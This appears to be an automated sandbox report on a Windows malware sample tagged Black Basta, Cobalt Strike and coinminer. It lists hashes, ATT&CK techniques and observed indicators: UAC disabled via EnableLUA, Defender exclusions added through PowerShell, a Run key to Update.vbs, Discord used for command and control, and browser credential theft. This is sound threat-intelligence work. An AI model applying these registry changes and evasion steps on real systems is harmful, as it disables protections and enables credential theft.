ee167f2873e1df0ca51f0b9b4cf9619ead2014f33a9b57d33f065baa7a021204

Analysis

max time kernel
19s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 04:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Size

37.3MB
MD5

c64d9334ce39e9bfb033f9f26f4c5f8b
SHA1

0e34b7104cdbe4308cb3778044ca29ee29c4824e
SHA256

ee167f2873e1df0ca51f0b9b4cf9619ead2014f33a9b57d33f065baa7a021204
SHA512

915cc1fa7535f2329982e5e4a03feb297e7416ee28c78a71d9574bc13813dece8d50d816fb3a5f17cc16c8f9ef0b7c60611684dbc151b1f1e3d0f7ece4628555
SSDEEP

393216:dQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgf96l+ZArYsFRl48h:d3on1HvSzxAMNfFZArYsmi3WLcvga

Score

10^/10

defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Signatures

UAC bypass 3 TTPs 6 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
31	544	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
32	544	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
42	1512	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
43	1512	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
44	2228	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
45	2228	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2100	powershell.exe
5880	powershell.exe
2856	powershell.exe
2948	powershell.exe
4224	Process not Found
536	powershell.exe
4984	powershell.exe
4164	Process not Found
1056	Process not Found
1780	powershell.exe
4544	powershell.exe
5508	powershell.exe
988	powershell.exe
5200	Process not Found
4812	Process not Found
6060	Process not Found
5280	Process not Found
4952	powershell.exe
4292	powershell.exe
4400	powershell.exe
1056	powershell.exe
5904	Process not Found
2328	Process not Found
3452	Process not Found
312	powershell.exe
4312	powershell.exe
3120	powershell.exe
4896	powershell.exe
5292	powershell.exe
3428	Process not Found
4616	Process not Found
5228	Process not Found
4324	powershell.exe
468	powershell.exe
224	Process not Found
4520	Process not Found
4624	Process not Found
4128	powershell.exe
224	powershell.exe
4952	powershell.exe
2216	Process not Found
5316	Process not Found
6120	powershell.exe
6120	powershell.exe
4004	powershell.exe
2416	powershell.exe
5764	Process not Found
2228	Process not Found
2100	powershell.exe
5876	powershell.exe
468	powershell.exe
5720	Process not Found
3140	Process not Found
4880	Process not Found
3520	Process not Found
2740	Process not Found
736	powershell.exe
1164	powershell.exe
6064	Process not Found
6128	Process not Found
4536	Process not Found
5648	Process not Found
1080	Process not Found
2136	powershell.exe

Checks computer location settings 2 TTPs 19 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 7 IoCs

pid	Process
4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
544	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
3484	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
3520	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
1512	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
2228	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
1376	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz = "C:\\ProgramData\\Update.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 44 IoCs

Web Service

T1102

flow	ioc
44	discord.com
97	discord.com
122	discord.com
113	discord.com
60	discord.com
87	discord.com
101	discord.com
124	discord.com
133	discord.com
136	discord.com
138	discord.com
26	discord.com
52	discord.com
74	discord.com
18	discord.com
68	discord.com
70	discord.com
140	discord.com
46	discord.com
50	discord.com
76	discord.com
95	discord.com
130	discord.com
147	discord.com
31	discord.com
35	discord.com
40	discord.com
91	discord.com
99	discord.com
105	discord.com
115	discord.com
126	discord.com
42	discord.com
48	discord.com
72	discord.com
83	discord.com
120	discord.com
128	discord.com
85	discord.com
103	discord.com
142	discord.com
145	discord.com
149	discord.com
155	discord.com

An obfuscated cmd.exe command-line is typically used to evade detection. 64 IoCs

pid	Process
5444	cmd.exe
2888	cmd.exe
5148	cmd.exe
3208	cmd.exe
2228	cmd.exe
5432	cmd.exe
5484	cmd.exe
1760	cmd.exe
4520	cmd.exe
5496	cmd.exe
3432	cmd.exe
4908	cmd.exe
3220	cmd.exe
1856	cmd.exe
5780	cmd.exe
3784	cmd.exe
1512	cmd.exe
3452	cmd.exe
2736	cmd.exe
4052	cmd.exe
3456	cmd.exe
4052	cmd.exe
1608	cmd.exe
4504	cmd.exe
924	cmd.exe
5784	cmd.exe
924	cmd.exe
2132	cmd.exe
5432	cmd.exe
1056	cmd.exe
5544	cmd.exe
892	cmd.exe
5848	cmd.exe
2128	cmd.exe
5004	cmd.exe
5576	cmd.exe
4964	cmd.exe
5752	cmd.exe
784	cmd.exe
4796	cmd.exe
2172	cmd.exe
4068	cmd.exe
6104	cmd.exe
4224	cmd.exe
4036	Process not Found
1180	Process not Found
5432	Process not Found
1816	Process not Found
6096	Process not Found
468	Process not Found
2604	Process not Found
5360	Process not Found
2968	Process not Found
3028	Process not Found
1164	Process not Found
4820	Process not Found
392	Process not Found
4904	Process not Found
2952	Process not Found
5484	Process not Found
2832	Process not Found
1184	Process not Found
4424	Process not Found
2168	Process not Found

Drops file in System32 directory 14 IoCs

description	ioc	Process
File created	C:\Windows\System32\BPRd8GfszB.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\lNifmFgCgw.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\bcGq5N2YGZ.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File created	C:\Windows\System32\r3q71cxBWn.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File created	C:\Windows\System32\p1MQRSpzCh.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\p1MQRSpzCh.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\BPRd8GfszB.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File created	C:\Windows\System32\6Zo7xESwKh.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\6Zo7xESwKh.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File created	C:\Windows\System32\lNifmFgCgw.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File created	C:\Windows\System32\bcGq5N2YGZ.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File created	C:\Windows\System32\QKQwEtKuqx.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\QKQwEtKuqx.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
File opened for modification	C:\Windows\System32\r3q71cxBWn.txt	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

discovery

Process Discovery

T1057

pid	Process
312	tasklist.exe
3912	tasklist.exe
1728	tasklist.exe
3088	tasklist.exe
6016	tasklist.exe
5344	Process not Found
1164	Process not Found
1120	tasklist.exe
1064	Process not Found
2968	Process not Found
2992	Process not Found
4796	Process not Found
4692	tasklist.exe
2472	tasklist.exe
3372	tasklist.exe
6008	Process not Found
5636	Process not Found
4852	Process not Found
5624	Process not Found
2524	Process not Found
5660	tasklist.exe
4548	tasklist.exe
3176	tasklist.exe
628	tasklist.exe
1844	Process not Found
5956	Process not Found
4928	Process not Found
4780	Process not Found
2992	tasklist.exe
2524	tasklist.exe
5580	Process not Found
1620	Process not Found
768	Process not Found
6092	Process not Found
1568	Process not Found
1120	tasklist.exe
5848	tasklist.exe
5672	Process not Found
2660	tasklist.exe
4620	tasklist.exe
4164	Process not Found
5104	Process not Found
3572	tasklist.exe
2268	tasklist.exe
5508	tasklist.exe
3176	tasklist.exe
452	Process not Found
5848	Process not Found
748	Process not Found
5200	tasklist.exe
5332	tasklist.exe
4068	Process not Found
5152	Process not Found
1728	Process not Found
544	Process not Found
3684	tasklist.exe
1580	tasklist.exe
4840	Process not Found
4404	Process not Found
4564	tasklist.exe
2228	tasklist.exe
2836	Process not Found
5504	Process not Found
1792	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 32 IoCs

pid	pid_target	Process	procid_target
5500	1964	WerFault.exe	844
5928	5216	Process not Found	950
4940	5144	Process not Found	1107
1384	784	Process not Found	1137
2488	3872	Process not Found	1060
4384	3348	Process not Found	1009
4520	216	Process not Found	1176
5380	5856	Process not Found	1307
2616	4156	Process not Found	1312
628	4964	Process not Found	1416
2304	748	Process not Found	1285
4924	4048	Process not Found	1257
3104	6124	Process not Found	1364
3496	3456	Process not Found	1380
4940	2836	Process not Found	1429
5200	6096	Process not Found	1378
3004	3772	Process not Found	1493
2992	3768	Process not Found	1518
3976	1740	Process not Found	1519
5432	5260	Process not Found	1501
4756	4428	Process not Found	1540
5260	5444	Process not Found	1551
4468	2100	Process not Found	1594
4464	2052	Process not Found	1621
2288	4004	Process not Found	1646
1652	1096	Process not Found	1255
544	1920	Process not Found	1648
980	1856	Process not Found	1634
5584	5924	Process not Found	1642
4500	2068	Process not Found	1769
2380	224	Process not Found	1764
3888	3152	Process not Found	1773

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4872	powershell.exe
4872	powershell.exe
944	powershell.exe
944	powershell.exe
944	powershell.exe
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
5852	powershell.exe
5852	powershell.exe
5852	powershell.exe
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe
3192	powershell.exe
3192	powershell.exe
3192	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
3104	powershell.exe
3104	powershell.exe
3104	powershell.exe
3516	powershell.exe
3516	powershell.exe
3516	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
1164	powershell.exe
1164	powershell.exe
1164	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
5088	powershell.exe
5088	powershell.exe
5088	powershell.exe
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
5996	powershell.exe
5996	powershell.exe
5996	powershell.exe
5856	powershell.exe
5856	powershell.exe
5856	powershell.exe
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
4108	powershell.exe
4108	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeIncreaseQuotaPrivilege	5856	WMIC.exe
Token: SeSecurityPrivilege	5856	WMIC.exe
Token: SeTakeOwnershipPrivilege	5856	WMIC.exe
Token: SeLoadDriverPrivilege	5856	WMIC.exe
Token: SeSystemProfilePrivilege	5856	WMIC.exe
Token: SeSystemtimePrivilege	5856	WMIC.exe
Token: SeProfSingleProcessPrivilege	5856	WMIC.exe
Token: SeIncBasePriorityPrivilege	5856	WMIC.exe
Token: SeCreatePagefilePrivilege	5856	WMIC.exe
Token: SeBackupPrivilege	5856	WMIC.exe
Token: SeRestorePrivilege	5856	WMIC.exe
Token: SeShutdownPrivilege	5856	WMIC.exe
Token: SeDebugPrivilege	5856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5856	WMIC.exe
Token: SeRemoteShutdownPrivilege	5856	WMIC.exe
Token: SeUndockPrivilege	5856	WMIC.exe
Token: SeManageVolumePrivilege	5856	WMIC.exe
Token: 33	5856	WMIC.exe
Token: 34	5856	WMIC.exe
Token: 35	5856	WMIC.exe
Token: 36	5856	WMIC.exe
Token: SeDebugPrivilege	4348	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5856	WMIC.exe
Token: SeSecurityPrivilege	5856	WMIC.exe
Token: SeTakeOwnershipPrivilege	5856	WMIC.exe
Token: SeLoadDriverPrivilege	5856	WMIC.exe
Token: SeSystemProfilePrivilege	5856	WMIC.exe
Token: SeSystemtimePrivilege	5856	WMIC.exe
Token: SeProfSingleProcessPrivilege	5856	WMIC.exe
Token: SeIncBasePriorityPrivilege	5856	WMIC.exe
Token: SeCreatePagefilePrivilege	5856	WMIC.exe
Token: SeBackupPrivilege	5856	WMIC.exe
Token: SeRestorePrivilege	5856	WMIC.exe
Token: SeShutdownPrivilege	5856	WMIC.exe
Token: SeDebugPrivilege	5856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5856	WMIC.exe
Token: SeRemoteShutdownPrivilege	5856	WMIC.exe
Token: SeUndockPrivilege	5856	WMIC.exe
Token: SeManageVolumePrivilege	5856	WMIC.exe
Token: 33	5856	WMIC.exe
Token: 34	5856	WMIC.exe
Token: 35	5856	WMIC.exe
Token: 36	5856	WMIC.exe
Token: SeDebugPrivilege	3452	tasklist.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeIncreaseQuotaPrivilege	312	WMIC.exe
Token: SeSecurityPrivilege	312	WMIC.exe
Token: SeTakeOwnershipPrivilege	312	WMIC.exe
Token: SeLoadDriverPrivilege	312	WMIC.exe
Token: SeSystemProfilePrivilege	312	WMIC.exe
Token: SeSystemtimePrivilege	312	WMIC.exe
Token: SeProfSingleProcessPrivilege	312	WMIC.exe
Token: SeIncBasePriorityPrivilege	312	WMIC.exe
Token: SeCreatePagefilePrivilege	312	WMIC.exe
Token: SeBackupPrivilege	312	WMIC.exe
Token: SeRestorePrivilege	312	WMIC.exe
Token: SeShutdownPrivilege	312	WMIC.exe
Token: SeDebugPrivilege	312	WMIC.exe
Token: SeSystemEnvironmentPrivilege	312	WMIC.exe
Token: SeRemoteShutdownPrivilege	312	WMIC.exe
Token: SeUndockPrivilege	312	WMIC.exe
Token: SeManageVolumePrivilege	312	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4700 wrote to memory of 4660	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	89
PID 4700 wrote to memory of 4660	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	89
PID 4660 wrote to memory of 4872	4660	cmd.exe	90
PID 4660 wrote to memory of 4872	4660	cmd.exe	90
PID 4872 wrote to memory of 4432	4872	powershell.exe	91
PID 4872 wrote to memory of 4432	4872	powershell.exe	91
PID 4432 wrote to memory of 5020	4432	csc.exe	92
PID 4432 wrote to memory of 5020	4432	csc.exe	92
PID 4700 wrote to memory of 5316	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	93
PID 4700 wrote to memory of 5316	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	93
PID 5316 wrote to memory of 5856	5316	cmd.exe	94
PID 5316 wrote to memory of 5856	5316	cmd.exe	94
PID 4700 wrote to memory of 4516	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	95
PID 4700 wrote to memory of 4516	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	95
PID 4516 wrote to memory of 4348	4516	cmd.exe	96
PID 4516 wrote to memory of 4348	4516	cmd.exe	96
PID 4700 wrote to memory of 5676	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	100
PID 4700 wrote to memory of 5676	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	100
PID 4700 wrote to memory of 5444	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	101
PID 4700 wrote to memory of 5444	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	101
PID 5444 wrote to memory of 944	5444	cmd.exe	102
PID 5444 wrote to memory of 944	5444	cmd.exe	102
PID 5676 wrote to memory of 3452	5676	cmd.exe	103
PID 5676 wrote to memory of 3452	5676	cmd.exe	103
PID 4700 wrote to memory of 2888	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	104
PID 4700 wrote to memory of 2888	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	104
PID 2888 wrote to memory of 2448	2888	cmd.exe	105
PID 2888 wrote to memory of 2448	2888	cmd.exe	105
PID 4700 wrote to memory of 4476	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	106
PID 4700 wrote to memory of 4476	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	106
PID 4476 wrote to memory of 4504	4476	cmd.exe	107
PID 4476 wrote to memory of 4504	4476	cmd.exe	107
PID 4700 wrote to memory of 3820	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	108
PID 4700 wrote to memory of 3820	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	108
PID 4700 wrote to memory of 1104	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	109
PID 4700 wrote to memory of 1104	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	109
PID 4700 wrote to memory of 724	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	110
PID 4700 wrote to memory of 724	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	110
PID 724 wrote to memory of 5852	724	cmd.exe	204
PID 724 wrote to memory of 5852	724	cmd.exe	204
PID 3820 wrote to memory of 312	3820	cmd.exe	112
PID 3820 wrote to memory of 312	3820	cmd.exe	112
PID 1104 wrote to memory of 3668	1104	cmd.exe	113
PID 1104 wrote to memory of 3668	1104	cmd.exe	113
PID 660 wrote to memory of 2736	660	cmd.exe	116
PID 660 wrote to memory of 2736	660	cmd.exe	116
PID 4700 wrote to memory of 3496	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	117
PID 4700 wrote to memory of 3496	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	117
PID 3496 wrote to memory of 4128	3496	cmd.exe	119
PID 3496 wrote to memory of 4128	3496	cmd.exe	119
PID 2736 wrote to memory of 544	2736	WScript.exe	120
PID 2736 wrote to memory of 544	2736	WScript.exe	120
PID 4700 wrote to memory of 6012	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	122
PID 4700 wrote to memory of 6012	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	122
PID 4700 wrote to memory of 4464	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	123
PID 4700 wrote to memory of 4464	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	123
PID 4700 wrote to memory of 5992	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	262
